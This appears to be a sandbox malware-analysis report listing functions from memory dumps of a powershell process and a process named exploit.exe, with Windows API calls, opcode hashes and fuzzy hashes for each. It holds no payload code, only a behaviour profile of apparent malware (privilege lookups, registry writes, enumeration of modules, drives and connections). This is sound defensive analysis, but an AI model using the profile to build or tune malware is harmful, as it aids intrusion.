Opcode ID: 906408dd22fbd2bcf952c75f6b43b7bdadbadc198c70542546913846715040f5
Instruction ID: a2e6b193901e688da1d8571a71f3694d8d8037f6909fa495b41c69e46af19345
Opcode Fuzzy Hash: 906408dd22fbd2bcf952c75f6b43b7bdadbadc198c70542546913846715040f5
Instruction Fuzzy Hash: A921C3715093806FEB11CB55DC45FA6BFACEF45320F0884EBE945CB292D268A944C765

Uniqueness

Uniqueness Score: 0.45%

Function 004CBC12, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CBC7C

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 63933f9184ab675bdd6eaed084d5505d8bb8be8301d781ddaf40908acb910326
Instruction ID: 9bac1db4a311d0c62671c2f817c1d893ce6fddfba97cc1958329cc1c8e2ede33
Opcode Fuzzy Hash: 63933f9184ab675bdd6eaed084d5505d8bb8be8301d781ddaf40908acb910326
Instruction Fuzzy Hash: 7A11DFB1504200AFEB21CF51DC85FABBBACEF44324F04886EEA05CB641D774A904CBB5

Uniqueness

Uniqueness Score: 0.09%

Function 004CB04A, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CB0AE

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 7b5c47510fd12166b37aa22fcf3ee7d36ec11fae20b70d7e38904f60a2cc51cf
Instruction ID: 7a671141981176be52d48bf28bf5d7843813fcbcbbe81376fc74ff22278c422d
Opcode Fuzzy Hash: 7b5c47510fd12166b37aa22fcf3ee7d36ec11fae20b70d7e38904f60a2cc51cf
Instruction Fuzzy Hash: A311AF75604200AFEB60CF16DC86F67BBACEF44324F14C46AE905CB651D774E9048AB6

Uniqueness

Uniqueness Score: 10.55%

Function 004CB97E, Relevance: 1.6, APIs: 1, Instructions: 66
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?), ref: 004CB9EF

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: f7a05147ce1d7e71497cc13a1d571c389a1b95131e08ef61f24ce36b3d8e1663
Instruction ID: 083d3c96979bae63a06c1db4c9162b82bfa474976db4eccae8a789d9c16821d3
Opcode Fuzzy Hash: f7a05147ce1d7e71497cc13a1d571c389a1b95131e08ef61f24ce36b3d8e1663
Instruction Fuzzy Hash: 7B2192755093C05FDB128B25DC55AA2BFA4EF07320F0984DAED858F263D269A908CB62

Uniqueness

Uniqueness Score: 37.75%

Function 004CAAAB, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004CAB1A

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 68a94a7b5daf407a5b305550bfe949508831c9fa71c4f2e86db34bd4cadbdbba
Instruction ID: 4e7b29579a2bad3f4c8cd833187d86528dc6ce6dba5c2123a864134ed3273097
Opcode Fuzzy Hash: 68a94a7b5daf407a5b305550bfe949508831c9fa71c4f2e86db34bd4cadbdbba
Instruction Fuzzy Hash: F721A2B15093805FDB21CF25CC44B53BFA8EF46224F08849EED49CB252E275E814CB72

Uniqueness

Uniqueness Score: 0.02%

Function 004CAF62, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CAFBE

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 01de6e185801c70f5c05bd6605d8fbc95e234eed9c95c8eaf63001d00c14411e
Instruction ID: 32965b6267e2f97f405889d7c6a14861347581eb08a9c93052b4d25048653962
Opcode Fuzzy Hash: 01de6e185801c70f5c05bd6605d8fbc95e234eed9c95c8eaf63001d00c14411e
Instruction Fuzzy Hash: 87112271504204AFEB208F15DC85F67FBA8EF84324F04846FEA058A641D774A804CBB6

Uniqueness

Uniqueness Score: 0.95%

Function 004CB212, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CB268

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 65c814e07cbbb46161f670b3368ffe37d4fe067ce6e7064f211a8497e57c02e7
Instruction ID: 821d6811781bb7dd28b21d7b20e2655d78076c1d01186b6ab49b95d42c1ee5a3
Opcode Fuzzy Hash: 65c814e07cbbb46161f670b3368ffe37d4fe067ce6e7064f211a8497e57c02e7
Instruction Fuzzy Hash: 01112371504200AFEB60CF11CC89FAABBACEF40324F0484ABEE05CB641D778A904CBB5

Uniqueness

Uniqueness Score: 0.45%

Function 004CB8D0, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 004CB93E

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 940870395e7de2af83da96cf0e0e9557718f719a5b23e881c51f05108f19d991
Instruction ID: 02ec25d0bdb6f601d3f3ebab34c40e21326aa2f1258f2e5c43a3fbc56eb37497
Opcode Fuzzy Hash: 940870395e7de2af83da96cf0e0e9557718f719a5b23e881c51f05108f19d991
Instruction Fuzzy Hash: 02115C76408380AFDB218F65DC45F52BFF4EF05320F08849EEA898B662D375A818CB61

Uniqueness

Uniqueness Score: 0.01%

Function 004CA33C, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(?,4EB46642,00000000,?,?,?,?,?,?,?,?,6D563C58), ref: 004CA39C

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 784db8e3d663dd9d6995639e210f93877cd0a53bb7c4b694bbd256b13b08373f
Instruction ID: 2ae856061246e41ca02818b803057ada06d2f607752059daa051d97908adc817
Opcode Fuzzy Hash: 784db8e3d663dd9d6995639e210f93877cd0a53bb7c4b694bbd256b13b08373f
Instruction Fuzzy Hash: A6118F714093C49FEB128B15DC54BA2BFB4DF47624F0880CAED844F263D265A818DB72

Uniqueness

Uniqueness Score: 0.01%

Function 004CAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004CAB1A

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5540a5be3661fbedc2c33ab1b5a4e350815a3614ececab0510296a7d32805931
Instruction ID: 661cc5642b8d0f312d9a3069e33c36d1f2672e3f75a3ae6401a99952b141733b
Opcode Fuzzy Hash: 5540a5be3661fbedc2c33ab1b5a4e350815a3614ececab0510296a7d32805931
Instruction Fuzzy Hash: 7B11A0B56043048FDB60CF15C884B52FBA8EB04324F08C4AAEE09CB301E678E814CA76

Uniqueness

Uniqueness Score: 0.02%

Function 004CAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 004CAA71

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: d9d15075e7261f6418b5ff0d6ba7e00ed0d0a9c390b28da48cd650719632f085
Instruction ID: ce39f2fcbf801420faccce8dda41f4212ddc6e01ad59f2ba66bb993d01987bae
Opcode Fuzzy Hash: d9d15075e7261f6418b5ff0d6ba7e00ed0d0a9c390b28da48cd650719632f085
Instruction Fuzzy Hash: 2B11917540D7C45FD7128B25DC85B92BFB4EF13324F0980DBD9858F263D269A909C762

Uniqueness

Uniqueness Score: 2.12%

Function 004CAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004CABC9

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: b451631c0ce8ecc32200b3debd8780c5c581c11525d598b2e2c9174cb7c6bf2f
Instruction ID: 780a8241ee523ffb9364761f1b74cbe6e5b86b8bfaee41f2c1feb8d970974f90
Opcode Fuzzy Hash: b451631c0ce8ecc32200b3debd8780c5c581c11525d598b2e2c9174cb7c6bf2f
Instruction Fuzzy Hash: 931182B54093849FDB11CF55DC85B92BFA4EF42324F0984EBED488F257D278A908CB62

Uniqueness

Uniqueness Score: 2.38%

Function 004CB8F2, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 004CB93E

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 94fdc51101d64603ce519cbf78ec42b33864406fd76a2234401f0d3748d19e03
Instruction ID: 0489299ac88131a4933bf18d2517dbddfeffcc0011b6fca83ebe3c88a989c511
Opcode Fuzzy Hash: 94fdc51101d64603ce519cbf78ec42b33864406fd76a2234401f0d3748d19e03
Instruction Fuzzy Hash: 161182754043409FDB60CF55D845F62FBE4EF44310F08C59EEE498A622D375E814DBA6

Uniqueness

Uniqueness Score: 0.01%

Function 004CB16A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E90,?,?), ref: 004CB1BA

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 5144253a053ace7bd18364d30a3faade49d90dd600b9bd9f52deb1dafb5a25a7
Instruction ID: dffd836a6c979104442d930ea5f82105f2b513c03e81a808453a0fe396dbf2c3
Opcode Fuzzy Hash: 5144253a053ace7bd18364d30a3faade49d90dd600b9bd9f52deb1dafb5a25a7
Instruction Fuzzy Hash: 26019E71900200AFD310CF16DC46B66FBA8FB88A20F14815AED088B745D271B915CAA6

Uniqueness

Uniqueness Score: 0.16%

Function 004CB9BA, Relevance: 1.5, APIs: 1, Instructions: 44UNIQUE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?), ref: 004CB9EF

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 65f5e0617a2918fbef5d9455eda2425f9c45ac75e28f020b29c6d9f2b32d13c1
Instruction ID: d4070fccded653cff916e31a6b73de418966815d41a4410403df2bbf0e5ba04e
Opcode Fuzzy Hash: 65f5e0617a2918fbef5d9455eda2425f9c45ac75e28f020b29c6d9f2b32d13c1
Instruction Fuzzy Hash: 8F01BC755042409FDB608F55D886B66FBA4EF44320F08C4AFED498B716D37AA804CBA6

Uniqueness

Uniqueness Score: 37.75%

Function 004CA8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E90,?,?), ref: 004CA94A

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: c6a35af7885f7d425e38de772e50c67052a5e58d5df0a6c65859983180711519
Instruction ID: 24f758794798f897a69666777be95534e2641338993899935e6943ff5c4f7acd
Opcode Fuzzy Hash: c6a35af7885f7d425e38de772e50c67052a5e58d5df0a6c65859983180711519
Instruction Fuzzy Hash: 9101AD71A00200ABD214CF16DC82F26FBA8FBC8B20F14811AED084BB41D371F916CBE6

Uniqueness

Uniqueness Score: 2.04%

Function 004CAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004CABC9

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: f623b3de2614af3d6f7f9661c83b028295ec451a8c8537dcdb53a9c17cff1f78
Instruction ID: 2fd403f6930a22c69c637e8a529a8506a668266f4ec891ea71b01e75d6a30dd9
Opcode Fuzzy Hash: f623b3de2614af3d6f7f9661c83b028295ec451a8c8537dcdb53a9c17cff1f78
Instruction Fuzzy Hash: 8B01D1744043448FDB50CF55D884B62FBA4EF40328F08C4ABDE088F316D378A844CAA7

Uniqueness

Uniqueness Score: 2.38%

Function 004CA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,4EB46642,00000000,?,?,?,?,?,?,?,?,6D563C58), ref: 004CA39C

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 933d7f14e051fcceacffd3ca93f5e34ea0e952dc3859df896ec3c365ffdcbab0
Instruction ID: 632f5b7b5a2853fd996bedbde6637e89aa2ce8d68064e42583a0bf954283f91f
Opcode Fuzzy Hash: 933d7f14e051fcceacffd3ca93f5e34ea0e952dc3859df896ec3c365ffdcbab0
Instruction Fuzzy Hash: 1BF0C278508384DFDB60CF05D885B65FBA0EF44728F08C09BDD094B726D379A958CAA7

Uniqueness

Uniqueness Score: 0.01%

Function 004CAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 004CAA71

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: ed5af7c53f924e0dedbda06e3d5953409a66ab66a9c6c8bb954face37f48de31
Instruction ID: 26bf39b570a60298d8a1bd8a43a5f601d5f472f0abbb0efaa4a20e7c6682f4b4
Opcode Fuzzy Hash: ed5af7c53f924e0dedbda06e3d5953409a66ab66a9c6c8bb954face37f48de31
Instruction Fuzzy Hash: C8F0CD384047888FDB50CF16D985B62FBA0EB44728F08C09BDD094B756D37AA954CAA7

Uniqueness

Uniqueness Score: 2.12%

Function 004CA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 004CA9C8

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b72ee5a8d79dd0101b1f292b77a09d539aa8e4a937e3940dce051d707e658094
Instruction ID: 53e3d2fd70a2dcc01f5f35d950d7651a764283e609d53c4b864a5865ccd7d027
Opcode Fuzzy Hash: b72ee5a8d79dd0101b1f292b77a09d539aa8e4a937e3940dce051d707e658094
Instruction Fuzzy Hash: 6D01D4755043448FDB508F15D885B66FB94DB44328F08C4AFDD098B716D279A814CBA6

Uniqueness

Uniqueness Score: 0.03%

Function 045C03BC, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.521712020.045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_45c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f3dfd4ef8854fb9be34d6976eec8811a512c169d6a9c5239a8229ab7cee0e26
Instruction ID: 6ac213e371c0cb17990e215f31d77202031160931e0b145aac1223a7aaf3ebb8
Opcode Fuzzy Hash: 8f3dfd4ef8854fb9be34d6976eec8811a512c169d6a9c5239a8229ab7cee0e26
Instruction Fuzzy Hash: 5401D632A0D2A0DFC36A4BE4644116AB7E0BF85A5470541BFC4588FA92DB30BC45D7D2

Uniqueness

Uniqueness Score: 0.00%

Function 01E507F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.518880217.01E50000.00000040.00000040.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64678310a240b9094e7a6b9103c2b4d1995271d5d52b6fd06815a93683a799c0
Instruction ID: 715944cdb295c5d5ac7d47cf0a304f9cc96495d2c85289300fda19e5fe517d93
Opcode Fuzzy Hash: 64678310a240b9094e7a6b9103c2b4d1995271d5d52b6fd06815a93683a799c0
Instruction Fuzzy Hash: F80186B650D7C06FD7128B159C50862FFB8EF8662070DC4DFED498B652D225A908CB72

Uniqueness

Uniqueness Score: 0.00%

Function 01E5081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.518880217.01E50000.00000040.00000040.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d6fb63c3f39ba3a5b4ed14a84975b5242129e50075a12e5966ce05122cd9ed
Instruction ID: aa2a64041ab5c89af66f7953a2187885e145c95b3f9268807215f7140449d8a0
Opcode Fuzzy Hash: 72d6fb63c3f39ba3a5b4ed14a84975b5242129e50075a12e5966ce05122cd9ed
Instruction Fuzzy Hash: 22E092B6A047008BD650CF0AEC41452F798EBC4A30B58C47FDC0D8B710D236B904CAA5

Uniqueness

Uniqueness Score: 0.00%

Function 004C23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.516447585.004C2000.00000040.00000001.sdmp, Offset: 004C2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c2000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec09fded6a7c49d1571153454400e811d26c5fad692153100a34acaa6c66de7d
Instruction ID: 1b8891842d202e36fafa6075c46208421b4f9396c830d103796bb01fef8d58e1
Opcode Fuzzy Hash: ec09fded6a7c49d1571153454400e811d26c5fad692153100a34acaa6c66de7d
Instruction Fuzzy Hash: 35D05E7D2086A14FD31A8A1CC2A4F9637E4AB91B08F4644FEE800CB7A3C3A8DD81D204

Uniqueness

Uniqueness Score: 0.00%

Function 004C23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.516447585.004C2000.00000040.00000001.sdmp, Offset: 004C2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c2000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8067cfd038e1eefe1baf40f4326ec63980bcdc41df89415156a49b917d8d28b9
Instruction ID: 7644582cf08090e83dbfab17aacf858e12f4cd0a0a9d53d835b927244bc652cc
Opcode Fuzzy Hash: 8067cfd038e1eefe1baf40f4326ec63980bcdc41df89415156a49b917d8d28b9
Instruction Fuzzy Hash: ABD05E383001814BD719CA1CC294F5A73E4AB80704F0644EDAC108B776C3FCDCC1C604

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: exploit.exe PID: 3068 Parent PID: 2344 exploit.exeCOMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	47
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004F0258, Relevance: 4.0, Strings: 3, Instructions: 278
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a%, xrefs: 004F0381
[0m^, xrefs: 004F0415
\0m^, xrefs: 004F034F

Memory Dump Source

Source File: 0000000A.00000002.533965168.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4f0000_exploit.jbxd

Similarity

API ID:
String ID: (a%$\0m^$[0m^
API String ID: 0-787462084
Opcode ID: 9fcf09d02c287d22e1131289a4236c603af069f4152d3bba2a56cdef0574e5f4
Instruction ID: f01875b0cc02a9bb5ef2a4a05a547e776fa35b6611e6c0c0c8fb76065406f5d4
Opcode Fuzzy Hash: 9fcf09d02c287d22e1131289a4236c603af069f4152d3bba2a56cdef0574e5f4
Instruction Fuzzy Hash: 7DB19E30F48208CFCB19DB74D484A7D37A2EB88345B11887ADA069B7A8DF359C55CF95

Uniqueness

Uniqueness Score: 100.00%

Function 004F024A, Relevance: 4.0, Strings: 3, Instructions: 275
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a%, xrefs: 004F0381
[0m^, xrefs: 004F0415
\0m^, xrefs: 004F034F

Memory Dump Source

Source File: 0000000A.00000002.533965168.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4f0000_exploit.jbxd

Similarity

API ID:
String ID: (a%$\0m^$[0m^
API String ID: 0-787462084
Opcode ID: 5f018462d1acf1cb2960ab5473ea4b2559f836c79b3f864e9949fac25565886d
Instruction ID: be5d185fee37b8312daca5b60576081b6eb29d110eec3bf2c29d4113ac7b7afc
Opcode Fuzzy Hash: 5f018462d1acf1cb2960ab5473ea4b2559f836c79b3f864e9949fac25565886d
Instruction Fuzzy Hash: BCB1BD30F48208CFCB19DB74D488A7D37A2EB88345B11887ADA069B7A8DF359C55CF95

Uniqueness

Uniqueness Score: 100.00%

Function 004F02A5, Relevance: 4.0, Strings: 3, Instructions: 251
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a%, xrefs: 004F0381
[0m^, xrefs: 004F0415
\0m^, xrefs: 004F034F

Memory Dump Source

Source File: 0000000A.00000002.533965168.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4f0000_exploit.jbxd

Similarity

API ID:
String ID: (a%$\0m^$[0m^
API String ID: 0-787462084
Opcode ID: 146030271c672583d43ad68c9c5a28a76d740e29a11245a1ea934fc010f5b9ed
Instruction ID: 86205ff86cda78365a2743847c7d112b2dbb351421a303e2aa642ef58a8874fa
Opcode Fuzzy Hash: 146030271c672583d43ad68c9c5a28a76d740e29a11245a1ea934fc010f5b9ed
Instruction Fuzzy Hash: 94A1AC30F48208CFCB19DB74D484A7D33A2EB88345B15887AEA0A9B7A8DF359C55CF55

Uniqueness

Uniqueness Score: 100.00%

Function 001CA94F, Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 001CAA05

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c25289ba8c9f0b6d342c4387230306b4cb7d0e45d778e93ae2ffa21535bf3f0
Instruction ID: fac786f0a73e9b4a0d456ccd52ed8cde559e922c9efdf20076428d25f3679fca
Opcode Fuzzy Hash: 7c25289ba8c9f0b6d342c4387230306b4cb7d0e45d778e93ae2ffa21535bf3f0
Instruction Fuzzy Hash: 7331B0B1409380AFE722CB25CD45F62BFE8EF46314F08849EE9848B252D375E909CB71

Uniqueness

Uniqueness Score: 0.01%

Function 001CA612, Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 001CA6B9

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 8609ea4430169173427624699343980ea139e7213f63201aa8b01a3da15de9b7
Instruction ID: 6c8aed778c00bad851282ac2a03cd5e17973d05d748ed43cd129f82e70d364da
Opcode Fuzzy Hash: 8609ea4430169173427624699343980ea139e7213f63201aa8b01a3da15de9b7
Instruction Fuzzy Hash: 8831AFB55093846FE722CB25CC85F96BFF8EF06314F09849AE944CB292D375E909C762

Uniqueness

Uniqueness Score: 0.03%

Function 001CA361, Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CA40C

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 693e1858db8bed239cb44f1fc115678b3a1cc62cdda25054729d3bf8e90bc1e2
Instruction ID: bb481eacd49bb03a2e131edbf3857c78afff8563e9dd52ffcddee50c95b34ec3
Opcode Fuzzy Hash: 693e1858db8bed239cb44f1fc115678b3a1cc62cdda25054729d3bf8e90bc1e2
Instruction Fuzzy Hash: 0831BF71509384AFE722CF11CC84F52BBB8EF06314F08849AE945CB193D324E909CB72

Uniqueness

Uniqueness Score: 0.03%

Function 001CA462, Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,4974BC4E,00000000,00000000,00000000,00000000), ref: 001CA4F8

Memory Dump Source

Source File: 0000000A.00000002.533572486.001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ca000_exploit.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aaf730f4cc25049f46ae8767c50e23872162c2872857dc2b68c713521c7d383
